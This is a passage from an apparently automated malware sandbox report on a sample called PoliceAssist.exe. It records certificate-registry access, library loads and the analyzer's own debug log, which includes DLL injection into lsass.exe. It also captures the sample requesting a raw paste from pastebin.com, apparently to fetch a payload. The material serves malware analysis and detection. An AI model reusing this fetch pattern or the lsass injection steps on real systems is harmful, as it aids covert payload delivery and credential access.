          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushNextDeltaSeconds",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 415,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 416,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
          "content": null
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 417,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 418,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 419,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 420,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
          "content": null
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 421,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\CA"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 422,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 423,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 424,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 425,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
          "content": null
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 426,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 427,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 428,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 429,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
          "content": null
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 430,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\CA"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 431,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 432,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 433,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 434,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 435,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 436,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob",
          "content": "\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb1\\xbc\\x96\\x8b\\xd4\\xf4\\x9db*\\xa8\\x9a\\x81\\xf2\\x15\\x01R\\xa4\\x1d\\x82\\x9c~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x04+\\xebw\\xd5\\x01z\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xe7\\xf3\\xb0`\\xd1\\x0e\\x90\\xa3\\x1b\\xa3G\\x1b\\x99\\x926\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00`{f\\x1aE\r\\x97\\xca\\x89P/}\\x04\\xcd4\\xa8\\xff\\xfc\\xfdKb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xeb\\xd4\\x10@\\xe4\\xbb>\\xc7B\\xc9\\xe3\\x81\\xd3\\x1e\\xf2\\xa4\\x1aH\\xb6h\\\\x96\\xe7\\xce\\xf3\\xc1\\xdfl\\xd43\\x1c\\x99\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00S\\x00i\\x00g\\x00n\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x00R\\x001\\x00\\x00\\x00S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t+\\x06\\x01\\x04\\x01\\xa02\\x01\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00h\\x00\\x00\\x000f\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x08\\x02\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x06\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x07\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08 
\\x00\\x00\\x00\\x01\\x00\\x00\\x00y\\x03\\x00\\x000\\x82\\x03u0\\x82\\x02]\\xa0\\x03\\x02\\x01\\x02\\x02\\x0b\\x04\\x00\\x00\\x00\\x00\\x01\\x15KZ\\xc3\\x940\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000W1"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 437,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRulesLogDir",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,391",
        "eid": 438,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRules",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,406",
        "eid": 439,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesLastSyncTime",
          "content": "\\xaf\\xa4!\\x93\\xa7Y\\xdc\\x01"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,406",
        "eid": 440,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesEncodedCtl",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:35,406",
        "eid": 441,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesEncodedCtl",
          "content": "0\\x82E\\x94\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x82E\\x850\\x82E\\x81\\x02\\x01\\x011\\x0b0\t\\x06\\x05+\\x0e\\x03\\x02\\x1a\\x05\\x000\\x82'\\xee\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x82'\\xdf0\\x82'\\xdb0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03 \\x04,P\\x00i\\x00n\\x00R\\x00u\\x00l\\x00e\\x00s\\x00_\\x00A\\x00u\\x00t\\x00o\\x00U\\x00p\\x00d\\x00a\\x00t\\x00e\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xd2\\xdae\\xad\\xdb@7\\x17\r170531232859Z\\x17\r180601232859Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\"\\x05\\x000\\x82\\x1f\\xa30)\\x04\\x12.files-df.1drv.com1\\x130\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000&\\x04\\x0f.files.1drv.com1\\x130\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x0004\\x04\n.aadrm.com1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x031\\x03\\x02\\x01\\x0101\\x04\\x07.afx.ms1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x031\\x03\\x02\\x01\\x0105\\x04\\x0b.akadns.net1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x031\\x03\\x02\\x01\\x010%\\x04\\x0e.aspnetcdn.com1\\x130\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x0008\\x04\\x0e.azure-int.net1&0\\x11\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x04\\x021\\x03\\x02\\x01\\x000\\x11\\x06\n+\\x06\\x01\\x04\\x01"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,609",
        "eid": 442,
        "data": {
          "file": "C:\\Windows\\System32\\mlang.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffec5430000"
        }
      },
      {
        "event": "findwindow",
        "object": "windowname",
        "timestamp": "2025-11-20 10:58:35,609",
        "eid": 443,
        "data": {
          "classname": "Shell_TrayWnd",
          "windowname": ""
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,656",
        "eid": 444,
        "data": {
          "file": "comctl32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffecf5a0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,687",
        "eid": 445,
        "data": {
          "file": "C:\\Windows\\System32\\msctf.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee21a0000"
        }
      },
      {
        "event": "execute",
        "object": "file",
        "timestamp": "2025-11-20 10:58:31,557",
        "eid": 446,
        "data": {
          "file": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,698",
        "eid": 447,
        "data": {
          "file": "C:\\Windows\\System32\\rsaenh.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffedfb90000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:31,632",
        "eid": 448,
        "data": {
          "file": "kernel32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee1660000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,725",
        "eid": 449,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemprox.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffedc850000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,741",
        "eid": 450,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemsvc.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffed94f0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,741",
        "eid": 451,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\fastprox.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffed3fc0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,757",
        "eid": 452,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wmiutils.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffedc210000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,788",
        "eid": 453,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\cimwin32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffec3810000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,803",
        "eid": 454,
        "data": {
          "file": "wldp.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee0500000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,803",
        "eid": 455,
        "data": {
          "file": "wldp.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee0500000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,819",
        "eid": 456,
        "data": {
          "file": "wldp.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee0500000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,819",
        "eid": 457,
        "data": {
          "file": "wldp.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee0500000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,819",
        "eid": 458,
        "data": {
          "file": "SECURITY.DLL",
          "pathtofile": null,
          "moduleaddress": "0x21e2c090000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,819",
        "eid": 459,
        "data": {
          "file": "C:\\Windows\\System32\\schannel.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffedfaa0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,835",
        "eid": 460,
        "data": {
          "file": "NTDLL.DLL",
          "pathtofile": null,
          "moduleaddress": "0x7ffee3470000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,866",
        "eid": 461,
        "data": {
          "file": "NETAPI32.DLL",
          "pathtofile": null,
          "moduleaddress": "0x7ffec3b80000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,882",
        "eid": 462,
        "data": {
          "file": "wkscli.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffedfcf0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,897",
        "eid": 463,
        "data": {
          "file": "cscapi.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffece280000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,897",
        "eid": 464,
        "data": {
          "file": "KERNEL32.DLL",
          "pathtofile": null,
          "moduleaddress": "0x7ffee1660000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,897",
        "eid": 465,
        "data": {
          "file": "OLEAUT32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2a80000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,741",
        "eid": 466,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemcore.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffed40d0000"
        }
      }
    ],
    "encryptedbuffers": [
      {
        "process_name": "PoliceAssist.exe",
        "pid": 3308,
        "api_call": "SslEncryptPacket",
        "buffer": "GET /raw/04TKQkE1 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: pastebin.com",
        "buffer_size": "158"
      }
    ]
  },
  "debug": {
    "log": "2025-11-20 02:03:39,056 [root] INFO: Date set to: 20251120T13:58:15, timeout set to: 200\n2025-11-20 13:58:15,020 [root] DEBUG: Starting analyzer from: C:\\nubpj4dt\n2025-11-20 13:58:15,020 [root] DEBUG: Storing results at: C:\\PJdnys\n2025-11-20 13:58:15,021 [root] DEBUG: Pipe server name: \\\\.\\PIPE\\HvOHjQz\n2025-11-20 13:58:15,021 [root] DEBUG: Python path: C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32\n2025-11-20 13:58:15,021 [root] INFO: analysis running as an admin\n2025-11-20 13:58:15,022 [root] INFO: analysis package specified: \"exe\"\n2025-11-20 13:58:15,022 [root] DEBUG: importing analysis package module: \"modules.packages.exe\"...\n2025-11-20 13:58:15,046 [root] DEBUG: imported analysis package \"exe\"\n2025-11-20 13:58:15,047 [root] DEBUG: initializing analysis package \"exe\"...\n2025-11-20 13:58:15,047 [lib.common.common] INFO: wrapping\n2025-11-20 13:58:15,047 [lib.core.compound] INFO: C:\\Temp already exists, skipping creation\n2025-11-20 13:58:15,048 [root] DEBUG: New location of moved file: C:\\Temp\\PoliceAssist.exe\n2025-11-20 13:58:15,048 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option\n2025-11-20 13:58:15,048 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option\n2025-11-20 13:58:15,048 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option\n2025-11-20 13:58:15,048 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option\n2025-11-20 13:58:15,069 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.browser\"\n2025-11-20 13:58:15,083 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.digisig\"\n2025-11-20 13:58:15,107 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.disguise\"\n2025-11-20 13:58:15,124 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.human\"\n2025-11-20 13:58:15,131 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'\n2025-11-20 
13:58:15,198 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'\n2025-11-20 13:58:15,200 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'\n2025-11-20 13:58:15,295 [lib.api.screenshot] INFO: Please upgrade Pillow to >= 5.4.1 for best performance\n2025-11-20 13:58:15,296 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.screenshots\"\n2025-11-20 13:58:15,299 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.tlsdump\"\n2025-11-20 13:58:15,300 [root] DEBUG: Initialized auxiliary module \"Browser\"\n2025-11-20 13:58:15,300 [root] DEBUG: attempting to configure 'Browser' from data\n2025-11-20 13:58:15,303 [root] DEBUG: module Browser does not support data configuration, ignoring\n2025-11-20 13:58:15,303 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.browser\"...\n2025-11-20 13:58:15,304 [root] DEBUG: Started auxiliary module modules.auxiliary.browser\n2025-11-20 13:58:15,305 [root] DEBUG: Initialized auxiliary module \"DigiSig\"\n2025-11-20 13:58:15,305 [root] DEBUG: attempting to configure 'DigiSig' from data\n2025-11-20 13:58:15,305 [root] DEBUG: module DigiSig does not support data configuration, ignoring\n2025-11-20 13:58:15,305 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.digisig\"...\n2025-11-20 13:58:15,306 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature\n2025-11-20 13:58:15,893 [modules.auxiliary.digisig] DEBUG: File is not signed\n2025-11-20 13:58:15,894 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json\n2025-11-20 13:58:15,902 [root] DEBUG: Started auxiliary module modules.auxiliary.digisig\n2025-11-20 13:58:15,902 [root] DEBUG: Initialized auxiliary module \"Disguise\"\n2025-11-20 13:58:15,902 [root] DEBUG: attempting to configure 'Disguise' from data\n2025-11-20 13:58:15,903 [root] DEBUG: module Disguise does not support data configuration, ignoring\n2025-11-20 13:58:15,903 [root] DEBUG: Trying to start auxiliary module 
\"modules.auxiliary.disguise\"...\n2025-11-20 13:58:15,904 [modules.auxiliary.disguise] INFO: Disguising GUID to 055f5de2-8eba-4c7c-bb64-628488f2ad24\n2025-11-20 13:58:15,904 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise\n2025-11-20 13:58:15,905 [root] DEBUG: Initialized auxiliary module \"Human\"\n2025-11-20 13:58:15,905 [root] DEBUG: attempting to configure 'Human' from data\n2025-11-20 13:58:15,905 [root] DEBUG: module Human does not support data configuration, ignoring\n2025-11-20 13:58:15,906 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.human\"...\n2025-11-20 13:58:15,908 [root] DEBUG: Started auxiliary module modules.auxiliary.human\n2025-11-20 13:58:15,909 [root] DEBUG: Initialized auxiliary module \"Screenshots\"\n2025-11-20 13:58:15,909 [root] DEBUG: attempting to configure 'Screenshots' from data\n2025-11-20 13:58:15,910 [root] DEBUG: module Screenshots does not support data configuration, ignoring\n2025-11-20 13:58:15,910 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.screenshots\"...\n2025-11-20 13:58:15,911 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots\n2025-11-20 13:58:15,912 [root] DEBUG: Initialized auxiliary module \"TLSDumpMasterSecrets\"\n2025-11-20 13:58:15,912 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data\n2025-11-20 13:58:15,913 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring\n2025-11-20 13:58:15,914 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.tlsdump\"...\n2025-11-20 13:58:15,918 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 608\n2025-11-20 13:58:16,105 [lib.api.process] INFO: Monitor config for <Process 608 lsass.exe>: C:\\nubpj4dt\\dll\\608.ini\n2025-11-20 13:58:16,108 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:16,108 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor\n2025-11-20 
13:58:16,117 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:16,156 [root] DEBUG: Loader: Injecting process 608 with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:16,178 [root] DEBUG: 608: Python path set to 'C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32'.\n2025-11-20 13:58:16,179 [root] DEBUG: 608: Disabling sleep skipping.\n2025-11-20 13:58:16,180 [root] DEBUG: 608: Interactive desktop enabled.\n2025-11-20 13:58:16,181 [root] DEBUG: 608: TLS secret dump mode enabled.\n2025-11-20 13:58:16,215 [root] DEBUG: 608: RtlInsertInvertedFunctionTable 0x00007FFEE348090E, LdrpInvertedFunctionTableSRWLock 0x00007FFEE35DD4F0\n2025-11-20 13:58:16,216 [root] DEBUG: 608: Monitor initialised: 64-bit capemon loaded in process 608 at 0x00007FFEB75E0000, thread 404, image base 0x00007FF60EE30000, stack from 0x000000A5F48F3000-0x000000A5F4900000\n2025-11-20 13:58:16,217 [root] DEBUG: 608: Commandline: C:\\Windows\\system32\\lsass.exe\n2025-11-20 13:58:16,229 [root] DEBUG: 608: Hooked 5 out of 5 functions\n2025-11-20 13:58:16,231 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-11-20 13:58:16,232 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:16,235 [lib.api.process] INFO: Injected into 64-bit <Process 608 lsass.exe>\n2025-11-20 13:58:16,235 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump\n2025-11-20 13:58:16,235 [root] INFO: Interactive mode enabled - injecting into explorer shell\n2025-11-20 13:58:16,236 [lib.api.process] INFO: Monitor config for <Process 2552 explorer.exe>: C:\\nubpj4dt\\dll\\2552.ini\n2025-11-20 13:58:16,238 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:16,241 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 
